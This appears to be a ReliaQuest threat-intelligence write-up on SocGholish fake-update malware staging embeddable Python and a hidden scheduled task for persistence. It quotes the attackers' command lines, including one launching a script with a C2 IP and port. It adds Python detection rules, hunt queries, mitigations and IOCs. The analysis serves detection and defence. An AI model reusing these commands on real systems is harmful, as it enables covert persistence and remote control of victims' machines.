Using Python for Persistence

In Q1 2024, ReliaQuest detected suspicious JavaScript files in customer environments—including “update.js,” a common file name used by SocGholish and other fake-update malware variants. While reviewing the execution of the first-stage payload, we identified a new behavior for this malware: the ingress of Python for persistence. 

The “SocGholish” malware family (aka “FakeUpdates”) is delivered via drive-by compromise. The attack typically starts from a compromised website with high search engine rankings and relies on social engineering to trick users into downloading a malicious JavaScript payload masquerading as a browser update. Upon execution, command-and-control (C2) is established, allowing adversaries to conduct further actions toward their objective.

ReliaQuest researchers have been tracking the SocGholish malware variant for some time: in Q1 2023, we responded to instances of SocGholish activity leading to the deployment of ransomware.

However, as defenders constantly deploy new security controls to combat threats, attackers adapt their craft in response. The discovery of SocGholish employing Python—instead of Blister Loader—for execution signals an evolution in the tactics, techniques, and procedures of threat actors utilizing this malware.

Infection Chain Steps

After the execution of “update.js” via the Windows utility “wscript.exe,” we observed the following new behaviors. Each command below triggers a series of actions, listed here:

Step One: Ingress

cmd.exe" /C powershell -c "wget hxxps[://]www[.]python[.]org/ftp/python/3.12.0/python-3.12.0-embed-amd64.zip -OutFile c:\programdata\python.zip;ls c:\programdata\python.zip;Expand-Archive -LiteralPath c:\programdata\python.zip -DestinationPath c:\programdata\py3;del c:\programdata\python.zip;ls c:\programdata\py3" >> "C:\Users\<username>\AppData\Local\Temp\radBG1A6.tmp"

1. Downloads the embeddable Python 3.12.0 distribution as “python.zip” from the official python.org download server, then lists the file with “ls” to confirm the download. Note that “wget” and “ls” here are PowerShell aliases (for Invoke-WebRequest and Get-ChildItem), not the GNU tools, so this step depends on no third-party binary.

2. Extracts the contents of python.zip with “Expand-Archive -LiteralPath” to the destination path “c:\programdata\py3”, a directory a standard user can write to without elevation.

3. Deletes the previously downloaded ZIP file, “python.zip”.

4. Lists the contents of “py3” with the command “ls”.

5. Appends the console output to “radBG1A6.tmp” in the user's Temp directory. Because cmd.exe's “>>” redirects only standard output, PowerShell errors would not be captured in this file.

Step Two: Execution

cmd.exe" /C rename "c:\programdata\py3\rad39987.tmp" "hklib.py" 

1. Renames the file “rad39987.tmp” to “hklib.py”. The temp file “rad39987.tmp” contains the malicious Python code that the following command executes.

Step Three: Persistence

C:\Windows\System32\cmd.exe" /C schtasks /create /f /tn "pypi-py" /tr "c:\programdata\py3\pythonw.exe c:\programdata\py3\hklib.py -ip 92.118.112[.]208 -port 443" /sc minute /mo 5&schtasks /run /tn "pypi-py" >> "C:\Users\<username>\AppData\Local\Temp\radE80E1.tmp 

1. Creates a scheduled task with the name “pypi-py”, overwriting any previously created tasks with the same name.  

2. Executes the Python script “hklib.py” with the ingressed Python interpreter, “pythonw.exe”. This interpreter doesn’t display the console window upon execution like the standard interpreter “python.exe”. This is to keep the malicious task hidden from the user. Based on a similar file found on VirusTotal, we suspect the hklib.py script is a SOCKS5 proxy client being used to establish a C2 connection to the IP and port specified in the command arguments. 

3. The arguments “-ip 92.118.112[.]208 -port 443” are passed to the Python script and specify the C2 address and port.

4. The task “pypi-py” is set to run every 5 minutes (“/sc minute /mo 5”) and is then started immediately with “schtasks /run”.

5. As in step one, standard output is appended to “radE80E1.tmp”; errors are not captured by “>>”.

Ingressing Python to establish persistence with a scheduled task (T1053.005) is new for SocGholish. It is likely intended to improve defense evasion (TA0005) compared to a traditional loader: the second-stage download comes from the trusted domain “python[.]org”, and the resulting interpreter is a legitimate, signed binary rather than a custom loader that security tools may already detect.
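Detection logic for the three commands above, as an added example (not ReliaQuest's code or a query from their platform). It runs chain-specific checks over constructed process-creation events: the command lines are the ones quoted in the steps, refanged before matching; the parent/image fields, rule names, severities and the set of “trusted” interpreter directories are assumptions made for the example.

```python
"""Detection logic for the SocGholish Python-persistence chain above.

Added example, not ReliaQuest's code. The three command lines are the ones
quoted in the steps (defanged exactly as in the write-up); parent/image
fields and the event shape are constructed to resemble Sysmon Event ID 1 /
Windows 4688 process-creation records.
"""
import re
from dataclasses import dataclass, field

# Assumption: where a Python interpreter is normally installed on Windows.
# pythonw.exe running from anywhere else (c:\programdata\py3 here) merits a look.
TRUSTED_PY_DIRS = (r"c:\program files\python", r"c:\program files (x86)\python",
                   r"\appdata\local\programs\python")
# Staging locations writable without elevation.
DROP_DIRS = (r"c:\programdata", r"\appdata\local\temp", r"c:\users\public")


def refang(s: str) -> str:
    """Undo the defanging used in the write-up so the rules see real log text."""
    return (s.replace("hxxp", "http").replace("[://]", "://")
             .replace("[.]", ".").replace("[dot]", "."))


@dataclass
class Finding:
    rule: str
    severity: str
    detail: dict = field(default_factory=dict)


def analyze(event: dict) -> list[Finding]:
    """Apply the chain-specific rules to one process-creation event."""
    cmd = refang(event["cmdline"]).lower()
    parent, image = event.get("parent", "").lower(), event.get("image", "").lower()
    out: list[Finding] = []

    # Rule 1: a script host (update.js under wscript.exe) spawning a shell.
    if parent.endswith(("wscript.exe", "cscript.exe")) and image.endswith(("cmd.exe", "powershell.exe")):
        out.append(Finding("script_host_spawns_shell", "medium", {"parent": parent, "image": image}))

    # Rule 2: PowerShell fetches the embeddable Python zip and expands it into a drop dir.
    # "wget" and "ls" are PowerShell aliases, so key on the URL and Expand-Archive, not the alias.
    if re.search(r"\b(powershell|pwsh)\b", cmd) and \
            re.search(r"python\.org/ftp/python/[\d.]+/python-[\d.]+-embed-", cmd):
        m = re.search(r'-destinationpath\s+"?([^\s";]+)', cmd)
        dest = m.group(1) if m else ""
        sev = "high" if any(d in dest for d in DROP_DIRS) else "medium"
        out.append(Finding("embeddable_python_ingress", sev, {"dest": dest}))

    # Rule 3: a staged .tmp file renamed to .py so the interpreter will accept it.
    m = re.search(r'\brename\s+"?([^\s"]+\.tmp)"?\s+"?([^\s"]+\.py)"?', cmd)
    if m:
        out.append(Finding("tmp_renamed_to_py", "low", {"src": m.group(1), "dst": m.group(2)}))

    # Rule 4: schtasks /create whose action runs a Python interpreter from an unusual path.
    if "schtasks" in cmd and "/create" in cmd:
        tr = re.search(r'/tr\s+"([^"]*)"', cmd)
        interp = re.match(r'\s*"?(.*?pythonw?\.exe)', tr.group(1)) if tr else None
        if interp and not any(t in interp.group(1) for t in TRUSTED_PY_DIRS):
            action = tr.group(1)
            tn = re.search(r'/tn\s+"?([^\s"]+)', cmd)
            script = re.search(r"(\S+\.pyw?)(?:\s|$)", action)
            ip = re.search(r"-ip\s+(\S+)", action)
            port = re.search(r"-port\s+(\d+)", action)
            sched = re.search(r"/sc\s+(\S+)(?:\s+/mo\s+(\d+))?", cmd)
            out.append(Finding("python_scheduled_task", "high", {
                "task": tn.group(1) if tn else "",
                "interpreter": interp.group(1),
                "script": script.group(1) if script else "",
                "ip": ip.group(1) if ip else "",
                "port": int(port.group(1)) if port else None,
                "schedule": " ".join(g for g in sched.groups() if g) if sched else "",
                "hidden_console": interp.group(1).endswith("pythonw.exe"),
            }))
    return out


def scan(events: list[dict]) -> list[Finding]:
    return [f for e in events for f in analyze(e)]


def chain_detected(findings: list[Finding]) -> bool:
    """High confidence only when ingress and the scheduled task are both seen."""
    return {"embeddable_python_ingress", "python_scheduled_task"} <= {f.rule for f in findings}


# Constructed events; command lines as quoted in the write-up, with cmd.exe's
# ">> ...tmp" output redirection omitted.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\wscript.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /C powershell -c "wget hxxps[://]www[.]python[.]org/ftp/python/3.12.0/python-3.12.0-embed-amd64.zip -OutFile c:\programdata\python.zip;ls c:\programdata\python.zip;Expand-Archive -LiteralPath c:\programdata\python.zip -DestinationPath c:\programdata\py3;del c:\programdata\python.zip;ls c:\programdata\py3"'},
    {"parent": r"C:\Windows\System32\wscript.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /C rename "c:\programdata\py3\rad39987.tmp" "hklib.py"'},
    {"parent": r"C:\Windows\System32\wscript.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /C schtasks /create /f /tn "pypi-py" /tr "c:\programdata\py3\pythonw.exe c:\programdata\py3\hklib.py -ip 92.118.112[.]208 -port 443" /sc minute /mo 5&schtasks /run /tn "pypi-py"'},
]

if __name__ == "__main__":
    hits = scan(SAMPLE_EVENTS)
    for f in hits:
        print(f"[{f.severity}] {f.rule}: {f.detail}")
    print("full chain observed:", chain_detected(hits))
```

The point of keying on the schtasks action rather than on file names is that task names, script names and the C2 address change from intrusion to intrusion, while an interpreter living under C:\ProgramData with an -ip/-port argument does not. Each rule on its own is a hunt lead; the ingress rule and the task rule firing on the same host (chain_detected) is the high-confidence alert.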

Unique Behavior Identification 

This is our first observation of SocGholish using Python, so we checked VirusTotal to see whether any samples exist. Based on the results, we are confident that this new behavior has not yet been shared with the security community.  

Query | Result
Behavior_command_executions:schtasks /create /f /tn*.py | 1 unrelated result.
Behavior_processes:Update.js attack_technique:T1053.005 | No results for persistence with scheduled tasks.
filename:update.js content:{707974686f6e} | Hex for “python” in an update.js file.
filename:update.js content:{507974686f6e} | Hex for “Python” in an update.js file.

What Does This Mean for Organizations? 

This new finding is further evidence of the continued chess game between adversaries and defenders. Defenders are aware of the dangers of commonly known file types, such as malicious executables (.exe) or obfuscated PowerShell scripts, but have far less experience with malicious use of Python, which is more often treated as a developer tool than as a payload. It also shows that adversaries are aware of the controls put in place and are implementing granular bypasses.

Recommendations  

  • Implement a group policy object to set Notepad as the default application for JavaScript (.js) files. A double-clicked “update.js” then opens in Notepad instead of running under wscript.exe, which stops the initial payload from executing through the file association (it does not stop a script explicitly launched with wscript.exe or cscript.exe).
  • Implement application control to block applications that are not needed for users' workflows. Restricting PowerShell and any Python interpreter outside approved install locations (here, an embeddable distribution dropped under C:\ProgramData) reduces the chance of successful execution. Note that “wget” in the observed command is a PowerShell alias for Invoke-WebRequest, so blocking a wget binary would not have stopped this download.
  • Configure Endpoint Detection and Response (EDR) systems to not only identify threats but also actively block them, preventing potential breaches before they can cause harm.
  • Enable the Microsoft Defender Attack Surface Reduction rule “Block JavaScript or VBScript from launching downloaded executable content.” Malware written in JavaScript or VBScript often acts as a downloader that fetches and launches other malware from the Internet.
  • Educate users to download browser updates only from trusted sources, such as the browser's built-in update mechanism.

IOCs

Domains: oystergardens[dot]club
Hashes (SHA-1): 34b4d749924384409c12988f4c7690751f4b7f7c
IPs: 92.118.112[.]208